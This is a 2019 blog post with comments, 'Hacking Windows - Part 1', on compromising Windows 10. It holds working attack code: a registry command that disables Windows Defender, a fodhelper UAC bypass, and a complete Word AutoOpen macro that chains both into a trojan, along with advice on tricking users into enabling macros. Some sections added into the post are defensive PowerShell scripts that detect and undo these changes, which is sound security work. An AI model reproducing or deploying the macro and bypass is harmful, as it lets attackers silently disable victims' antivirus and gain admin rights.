Hacking Windows - Part 1 by georgontech

In this article I'm going to cover the most common methods used to compromise a Windows 10 system. Starting with social engineering, then bypassing UAC and disabling antivirus, this article will give you insight into how attackers could infect your computer.

<i>This article is for educational purposes only. I am not responsible for any damage done to your own or other people's computers.</i>

<center>
https://cdn.steemitimages.com/DQmcm2qZ3XA83smpykZD8ythBgWJUgUsiNoHRzvpjBNP3h2/coding_computer_hacker_hacking_html_programmer_programming_script-1366057.jpg
</center>

<h2>Social Engineering</h2>

Most of the time, people get a virus because they were socially engineered. But what does that mean? Wikipedia says,

<i>"Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information. This differs from social engineering within the social sciences, which does not contain the divulging of confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme."</i>

A very common way to get a virus onto your computer is through Word or PDF documents. These documents can run small pieces of code in the background if that is enabled. By default Windows disables this functionality, but with a bit of social engineering magic many people can be tricked into allowing these so-called "macros" to be executed. Keep that in mind until the end of this article...

<center>
https://cdn.steemitimages.com/DQmRqKqN6YjFduPcqT1RC9rksa6GDAYYZQyz5kJVcBS6GxA/Screenshot__20_-10ee2356e2c2bf31.png
<i>Example of a malicious Word document</i>
</center>


<h2>Turning off Windows Defender</h2>

Windows Defender can be a really annoying piece of software, but nonetheless it helps to keep your computer clean. Of course, as attackers we want to switch it off, so we can do all the "hard" stuff afterwards. This can be achieved via cmd by editing the registry.

You can open your cmd as admin and type:

<blockquote>

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "00000001" /f & REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d "00000001" /f & REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d "00000001" /f & REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d "00000001" /f 

</blockquote>

This adds four registry values which turn off Defender permanently! To turn it back on you need to remove those entries by typing:

<blockquote>

REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender"

</blockquote>

Of course, as an attacker we have no access to a cmd console, let alone one with admin rights. So we're going to need something "hacky": a trick to gain elevated rights without the user noticing...

<center>
https://cdn.steemitimages.com/DQmVy3T7UcTSMM5drQ9iMiSyKW6KjGdawUkeAvcM4AU228T/Unbenannt.JPG
<i>All switches are grayed out. You cannot turn Defender back on manually.</i>
</center>
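The defender's side of this section, as an added example that is not part of the original post: a PowerShell audit that checks whether the four policy values from the REG ADD line above are set, compares that with what the Defender engine itself reports, pulls Defender's own "protection disabled" events, and (only when you call the last function, from an elevated shell) removes just those four values instead of deleting the whole policy key as the REG DELETE line does. It assumes Windows 10 with the Defender PowerShell module present (Get-MpComputerStatus). One caveat worth knowing: since the August 2020 Defender platform update (4.18.2007.8) the DisableAntiSpyware value is ignored on client builds, and with Tamper Protection switched on the other three are blocked as well, so "permanently" only holds on systems without those protections.

```powershell
# Added example, not from the original post. Audits the four Defender policy
# values the post's REG ADD line writes, compares them with what Defender
# itself reports, and (only via Remove-DefenderPolicyOverride) deletes them.
# Assumes Windows 10 with the Defender module (Get-MpComputerStatus) present.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
$RtpKey     = "$PolicyRoot\Real-Time Protection"

# The values from the post; a DWORD of 1 in any of them is a policy override.
$Watched = @(
    @{ Key = $PolicyRoot; Name = 'DisableAntiSpyware' }
    @{ Key = $RtpKey;     Name = 'DisableBehaviorMonitoring' }
    @{ Key = $RtpKey;     Name = 'DisableOnAccessProtection' }
    @{ Key = $RtpKey;     Name = 'DisableScanOnRealtimeEnable' }
)

function Get-DefenderPolicyOverride {
    foreach ($w in $Watched) {
        $props = Get-ItemProperty -Path $w.Key -ErrorAction SilentlyContinue
        if ($null -ne $props -and $null -ne $props.PSObject.Properties[$w.Name]) {
            [pscustomobject]@{
                Key       = $w.Key
                Name      = $w.Name
                Value     = $props.($w.Name)
                # Only 1 disables; an explicit 0 is a harmless "enabled".
                Disabling = ($props.($w.Name) -eq 1)
            }
        }
    }
}

function Get-DefenderLiveStatus {
    # What the engine reports right now. IsTamperProtected only exists on
    # builds that ship Tamper Protection; it shows as empty elsewhere.
    Get-MpComputerStatus -ErrorAction SilentlyContinue |
        Select-Object AntivirusEnabled, RealTimeProtectionEnabled,
                      BehaviorMonitorEnabled, OnAccessProtectionEnabled, IsTamperProtected
}

function Get-DefenderDisableEvents {
    param([int]$Hours = 24)
    # Defender keeps its own audit trail: 5001 real-time protection disabled,
    # 5004 real-time protection configuration changed, 5007 platform
    # configuration changed, 5010/5012 malware/virus scanning disabled.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5007, 5010, 5012
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

function Remove-DefenderPolicyOverride {
    # Needs an elevated shell. Removes only the four values, not the whole key,
    # so any other legitimate Defender policy on the machine survives.
    foreach ($f in Get-DefenderPolicyOverride) {
        Remove-ItemProperty -Path $f.Key -Name $f.Name -Force
        Write-Host "Removed $($f.Key)\$($f.Name)"
    }
}

# Usage: report only; uncomment the last line in an elevated shell to undo.
$overrides = @(Get-DefenderPolicyOverride)
if ($overrides.Count -eq 0) {
    Write-Host 'No Defender policy overrides found.'
} else {
    $overrides | Format-Table -AutoSize
}
Get-DefenderLiveStatus | Format-List
Get-DefenderDisableEvents | Format-Table -AutoSize
# Remove-DefenderPolicyOverride
```

The registry check and the live status are deliberately shown side by side: a policy value of 1 with RealTimeProtectionEnabled still True means Tamper Protection held, while False with no policy value at all points at a different cause (a third-party AV registered, or the service stopped) and is worth investigating separately.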

<h2>Bypassing UAC in Windows</h2>

After a few "tricks" rather than real hacking, here comes something most people would actually consider "hacking". This section is about gaining admin privileges without showing the user an ugly UAC prompt. The process is completely silent and lets you do ANY admin task on a victim's computer. It will later help us switch off Windows Defender without an admin shell.

Basically we're just opening a standard Windows tool called fodhelper.exe (every Windows 10 computer has it). Click the Windows button, type fodhelper, and there it is.

When this little program starts it looks for a registry entry in:

<blockquote>

HKCU\Environment\windir

</blockquote>

Usually this entry is empty or non-existent. By adding (or modifying) it, we're able to trick fodhelper into running a specific command. And because fodhelper is a standard Windows tool, it has admin rights by default. So the only thing we need to do is add the registry entry with the task we want to accomplish, and fodhelper will run that command with elevated rights. Luckily this registry entry is for the current user only, so we need NO ELEVATED RIGHTS to create it.

To edit the registry entry just type:

<blockquote>

REG ADD "HKCU\Environment" /v "windir" /d "cmd /c whatever console command you want to be executed with admin privileges"

</blockquote>

When you now start fodhelper as a regular user, the program looks for the value in "HKCU\Environment\windir" and executes our cmd command with admin privileges.

By the way, in my opinion this is a really, really big security issue in Windows 10, and it's a shame Microsoft hasn't done anything about it yet. The fact that this vulnerability has been known since at least 2017 makes it even worse.
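How a defender spots and cleans up the per-user windir override described above, as an added example that is not part of the original post. Windows defines windir as a system environment variable (under HKLM), never as a per-user one, so the mere existence of HKCU\Environment\windir is worth a look, and one whose value is a command line rather than a directory is a finding. The script reports both, optionally hunts for the write itself in Sysmon RegistryEvent (event ID 13) records, and removes the value without needing elevation. It assumes Windows 10; the Sysmon part assumes Sysmon is installed with registry value logging enabled.

```powershell
# Added example, not from the original post. Looks for the per-user "windir"
# override the post plants under HKCU\Environment, shows what Windows itself
# defines windir as, and optionally hunts for the write in Sysmon events.
# Assumes Windows 10; Get-WindirRegistryWrites assumes Sysmon event ID 13 logging.

function Get-UserWindirOverride {
    $userEnv = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
    $sysEnv  = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'

    $userValue = $null
    if ($null -ne $userEnv -and $null -ne $userEnv.PSObject.Properties['windir']) {
        $userValue = $userEnv.windir
    }

    [pscustomobject]@{
        SystemWindir     = $sysEnv.windir     # normally %SystemRoot%, a directory
        UserWindir       = $userValue         # normally $null: Windows never sets this
        Overridden       = ($null -ne $userValue)
        # A directory path contains no shell name or executable; a hijack does.
        LooksLikeCommand = ($null -ne $userValue -and $userValue -match '(?i)\b(cmd|powershell)\b|\.exe')
    }
}

function Get-WindirRegistryWrites {
    param([int]$Hours = 24)
    # Sysmon event 13 = registry value set. The event XML is parsed by field
    # name rather than relying on the position of fields in Properties.
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 13
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data.TargetObject -like '*\Environment\windir') {
            [pscustomobject]@{
                Time         = $e.TimeCreated
                User         = $data.User
                Image        = $data.Image        # WINWORD.EXE writing here is the post's scenario
                TargetObject = $data.TargetObject
                Details      = $data.Details      # the planted command line
            }
        }
    }
}

function Remove-UserWindirOverride {
    # No elevation needed: the value lives in the current user's hive.
    if ((Get-UserWindirOverride).Overridden) {
        Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force
        Write-Host 'Removed HKCU\Environment\windir'
    }
}

# Usage: report, then clean up if the override is present.
Get-UserWindirOverride | Format-List
Get-WindirRegistryWrites | Format-Table -AutoSize
# Remove-UserWindirOverride
```

Because the registry write is the only precondition the post needs, alerting on any value set under HKCU\Environment\windir (the Sysmon query above, or the equivalent rule in your SIEM) catches this variant before fodhelper ever starts; the Image field tells you which process planted it, which is what makes the Word-macro origin in the next section visible.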



<h2>Finally...</h2>

Now we've got all the tools an attacker needs to gain access to your computer and turn off all security mechanisms. We only need to pack them nicely inside a Word document so nobody notices our trojan.

Let's open Word and create a macro...


1 Open a new Word Document

2 In the toolbar go to View and click on Macros

3 Create a new macro with the name AutoOpen
<center>
https://cdn.steemitimages.com/DQmRVpiovqu3e2hqEvUJooi7hogcmE1AXzjRvC4mugTrWvM/Unben111111111annt.JPG
</center>

4 Insert the following code:

<blockquote>
Sub AutoOpen()

'Hijack Registry to turn off Windows Defender as soon as fodhelper.exe is started (on next startup)

Set wshShell = CreateObject("WScript.Shell")

'The following line modifies the regkey in a way that it is run as admin when opening fodhelper, which turns off defender

wshShell.RegWrite "HKCU\Environment\windir", "cmd /c REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v ""DisableAntiSpyware"" /t ""REG_DWORD"" /d ""00000001"" /f & REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v ""DisableBehaviorMonitoring"" /t ""REG_DWORD"" /d ""00000001"" /f & REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v ""DisableOnAccessProtection"" /t ""REG_DWORD"" /d ""00000001"" /f & REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v ""DisableScanOnRealtimeEnable"" /t ""REG_DWORD"" /d ""00000001"" /f "

Shell ("cmd /c fodhelper")
Set wshShell = Nothing

End Sub

</blockquote>

<center>
https://cdn.steemitimages.com/DQmQoE9Dv96C6RmLMEXDtqC4oYEs6AyWnEJtiHUywCapPxZ/Unb2222222222222enannt.JPG
</center>

5 Save the document with the .docm extension (this is important to also save the macro)

6 A real attacker would add an image like the one from the section "Social Engineering" to trick users into allowing macros

When you now open your file you'll usually see an orange bar which asks you whether you want to enable macros for this document. This is an often underrated security feature in Windows, although most people will just click Enable Content, especially if they were social engineered properly.

If you click Enable Content, the code is executed in the background and shuts down your whole security system by using the UAC bypass and the registry entries that disable Defender, without you even noticing it.
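Where that orange bar comes from, and how to check that it cannot be clicked away, as an added example that is not part of the original post. Word's macro behaviour is a registry setting called VBAWarnings (1 = enable all, 2 = disable with notification, which is the orange bar and the default, 3 = signed only, 4 = disable without notification); a value under the Policies hive overrides the user's own choice, and a separate policy value, blockcontentexecutionfrominternet, blocks macros outright in files carrying a Mark-of-the-Web. The script reports the effective setting and triages a document: whether it contains a VBA project at all (a .docm is a ZIP, and the macro lives in word/vbaProject.bin) and whether it carries the Zone.Identifier stream that marks it as downloaded or mailed. It assumes Office 2016 or later (registry version key 16.0); the document path at the end is a placeholder.

```powershell
# Added example, not from the original post. Reports Word's effective macro
# setting and triages a .docm for a VBA project and a Mark-of-the-Web.
# Assumes Office 2016+ (16.0 registry keys); the file path is a placeholder.

$WordSecurityUser   = 'HKCU:\Software\Microsoft\Office\16.0\Word\Security'
$WordSecurityPolicy = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security'

function Get-WordMacroSetting {
    $names = @{ 1 = 'Enable all macros'; 2 = 'Disable with notification (orange bar)'
                3 = 'Digitally signed only'; 4 = 'Disable without notification' }
    $policy = Get-ItemProperty -Path $WordSecurityPolicy -ErrorAction SilentlyContinue
    $user   = Get-ItemProperty -Path $WordSecurityUser   -ErrorAction SilentlyContinue

    $effective = 2          # Word's default when nothing is set
    $source    = 'default'
    if ($user -and $null -ne $user.PSObject.Properties['VBAWarnings'])     { $effective = $user.VBAWarnings;   $source = 'user' }
    if ($policy -and $null -ne $policy.PSObject.Properties['VBAWarnings']) { $effective = $policy.VBAWarnings; $source = 'policy' }

    # Policy "Block macros from running in Office files from the Internet"
    $blockInternet = $false
    if ($policy -and $null -ne $policy.PSObject.Properties['blockcontentexecutionfrominternet']) {
        $blockInternet = ($policy.blockcontentexecutionfrominternet -eq 1)
    }

    [pscustomobject]@{
        VBAWarnings             = $effective
        Meaning                 = $names[[int]$effective]
        SetBy                   = $source
        BlockMacrosFromInternet = $blockInternet
        # Either a setting the user cannot click through, or an Internet block
        Hardened                = ($effective -ge 3 -or $blockInternet)
    }
}

function Test-DocmDocument {
    param([Parameter(Mandatory)][string]$Path)
    # The Office Open XML container is a ZIP; the macro is word/vbaProject.bin.
    Add-Type -AssemblyName System.IO.Compression.FileSystem
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        $hasVba = [bool]($zip.Entries | Where-Object { $_.FullName -eq 'word/vbaProject.bin' })
    } finally { $zip.Dispose() }

    # Mark-of-the-Web: NTFS alternate stream Zone.Identifier with ZoneId=3
    # (Internet) or 4 (Restricted). Office consults it for Protected View.
    $zone = $null
    $motw = Get-Content -Path $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue
    foreach ($line in @($motw)) {
        if ($line -match '^ZoneId=(\d)') { $zone = [int]$Matches[1]; break }
    }

    [pscustomobject]@{
        Path          = $Path
        ContainsMacro = $hasVba
        ZoneId        = $zone
        FromInternet  = ($zone -ge 3)
    }
}

# Usage
Get-WordMacroSetting | Format-List
# Test-DocmDocument -Path 'C:\Users\example\Downloads\invoice.docm' | Format-List   # placeholder path
```

A document that reports ContainsMacro True and FromInternet True is exactly the case the policy value above is meant to stop; if Hardened comes back False on a machine that receives mail, that is the setting to change before worrying about any of the registry tricks in the earlier sections.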


<h2>Part 2</h2>

If you're interested in how an attacker would get malicious code like ransomware onto your computer after disabling your security systems (and what this code would look like), just vote up and follow me. The more people like this post, the more likely I am to write more on this topic.
Posted 2019-01-05 00:30:27 in #technology (tags: technology, hacking, trojan, security, windows)
@ubasti ·
Mitnick said it, Q proved it with a 16-year-old girl, the weakest link is humans ... local access and

and euhm ... I remember when Telenet here was SO nice you could enter an IP address in the search on the start menu and if someone had a shared folder on their PC in Windows you could just access it ... but that's been a while

I use Windows for gaming only really, otherwise I simply stick to minimal Linux systems (which doesn't mean it's safe ... anyone with a keylogger who had local access could still do anything I suppose)

but I'm not a hacker and I don't wanna feed the trolls lol
Posted 2019-01-05 00:33:45
@promobot ·
@georgontech purchased a 19.65% vote from @promobot on this post.

*If you disagree with the reward or content of this post you can purchase a reversal of this vote by using our curation interface http://promovotes.com
Posted 2019-01-05 09:27:27